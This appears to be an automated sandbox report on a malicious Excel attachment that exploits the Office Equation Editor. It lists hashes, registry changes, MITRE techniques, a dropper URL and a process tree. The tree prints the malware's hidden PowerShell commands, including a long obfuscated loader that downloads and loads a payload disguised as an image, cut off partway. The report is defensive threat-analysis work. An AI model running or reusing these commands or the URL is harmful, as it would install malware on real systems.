c36edbf6ff6981ab06c2bebafef7340da2c28565751b4e1e6bedb4cd02f992b4

Analysis

max time kernel
13s
max time network
145s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
02/10/2023, 15:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Ord.For.NGF2301820.xls
Size

146KB
MD5

3c80a3404a12b03596de173b7c2395d8
SHA1

0f2747a0d918456486c729f6f47f41b1523c7ff0
SHA256

c36edbf6ff6981ab06c2bebafef7340da2c28565751b4e1e6bedb4cd02f992b4
SHA512

94e9da4e191f0282046cd7430b4588534fc0006288f0ba1dbcafb2dae6058d79c95987d8b303daa9c07b487d01329b7e9202b3502bf0e399857bbe67fa8389b9
SSDEEP

3072:F/kJAg15QiSCz0Huru1bsNTL3SupLsld9kgYUWo:F/unQKAOHFpLKdJ

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
10	1620	EQNEDT32.EXE
12	1620	EQNEDT32.EXE
14	1620	EQNEDT32.EXE
15	1620	EQNEDT32.EXE

Abuses OpenXML format to download file from external location

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1620	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2972	EXCEL.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2972	EXCEL.EXE
2972	EXCEL.EXE
2972	EXCEL.EXE
2756	WINWORD.EXE
2756	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 1748	1620	EQNEDT32.EXE	31
PID 1620 wrote to memory of 1748	1620	EQNEDT32.EXE	31
PID 1620 wrote to memory of 1748	1620	EQNEDT32.EXE	31
PID 1620 wrote to memory of 1748	1620	EQNEDT32.EXE	31

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Ord.For.NGF2301820.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2972

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2756
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1476

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Processer.vbs"
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Regasm.vbs -Force }
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Ng◀▶v◀▶DY◀▶M◀▶◀▶5◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶C4◀▶agBw◀▶Gc◀▶Pw◀▶x◀▶DY◀▶OQ◀▶1◀▶DQ◀▶M◀▶◀▶4◀▶Dk◀▶Mw◀▶3◀▶Cc◀▶Ow◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C◀▶◀▶PQ◀▶g◀▶E4◀▶ZQB3◀▶C0◀▶TwBi◀▶Go◀▶ZQBj◀▶HQ◀▶I◀▶BT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶E4◀▶ZQB0◀▶C4◀▶VwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶Ow◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶B3◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶u◀▶EQ◀▶bwB3◀▶G4◀▶b◀▶Bv◀▶GE◀▶Z◀▶BE◀▶GE◀▶d◀▶Bh◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶KQ◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBF◀▶G4◀▶YwBv◀▶GQ◀▶aQBu◀▶Gc◀▶XQ◀▶6◀▶Do◀▶VQBU◀▶EY◀▶O◀▶◀▶u◀▶Ec◀▶ZQB0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶QgB5◀▶HQ◀▶ZQBz◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶UwBU◀▶EE◀▶UgBU◀▶D4◀▶Pg◀▶n◀▶Ds◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶RQBO◀▶EQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶BP◀▶GY◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶ZQBu◀▶GQ◀▶RgBs◀▶GE◀▶Zw◀▶p◀▶Ds◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶GU◀▶I◀▶◀▶w◀▶C◀▶◀▶LQBh◀▶G4◀▶Z◀▶◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶HQ◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶r◀▶D0◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C4◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶Ow◀▶k◀▶GI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶Ew◀▶ZQBu◀▶Gc◀▶d◀▶Bo◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶UwB1◀▶GI◀▶cwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶L◀▶◀▶g◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶KQ◀▶7◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶EM◀▶bwBu◀▶HY◀▶ZQBy◀▶HQ◀▶XQ◀▶6◀▶Do◀▶RgBy◀▶G8◀▶bQBC◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BT◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶p◀▶Ds◀▶J◀▶Bs◀▶G8◀▶YQBk◀▶GU◀▶Z◀▶BB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FI◀▶ZQBm◀▶Gw◀▶ZQBj◀▶HQ◀▶aQBv◀▶G4◀▶LgBB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶XQ◀▶6◀▶Do◀▶T◀▶Bv◀▶GE◀▶Z◀▶◀▶o◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶u◀▶Ec◀▶ZQB0◀▶FQ◀▶eQBw◀▶GU◀▶K◀▶◀▶n◀▶EY◀▶aQBi◀▶GU◀▶cg◀▶u◀▶Eg◀▶bwBt◀▶GU◀▶Jw◀▶p◀▶Ds◀▶J◀▶Bt◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶HQ◀▶eQBw◀▶GU◀▶LgBH◀▶GU◀▶d◀▶BN◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶o◀▶Cc◀▶VgBB◀▶Ek◀▶Jw◀▶p◀▶C4◀▶SQBu◀▶HY◀▶bwBr◀▶GU◀▶K◀▶◀▶k◀▶G4◀▶dQBs◀▶Gw◀▶L◀▶◀▶g◀▶Fs◀▶bwBi◀▶Go◀▶ZQBj◀▶HQ◀▶WwBd◀▶F0◀▶I◀▶◀▶o◀▶Cc◀▶d◀▶B4◀▶HQ◀▶LgBU◀▶EQ◀▶UwBV◀▶C8◀▶dwB6◀▶C8◀▶dwB3◀▶Hc◀▶eg◀▶v◀▶DM◀▶Mg◀▶u◀▶DY◀▶MQ◀▶u◀▶DI◀▶O◀▶◀▶x◀▶C4◀▶M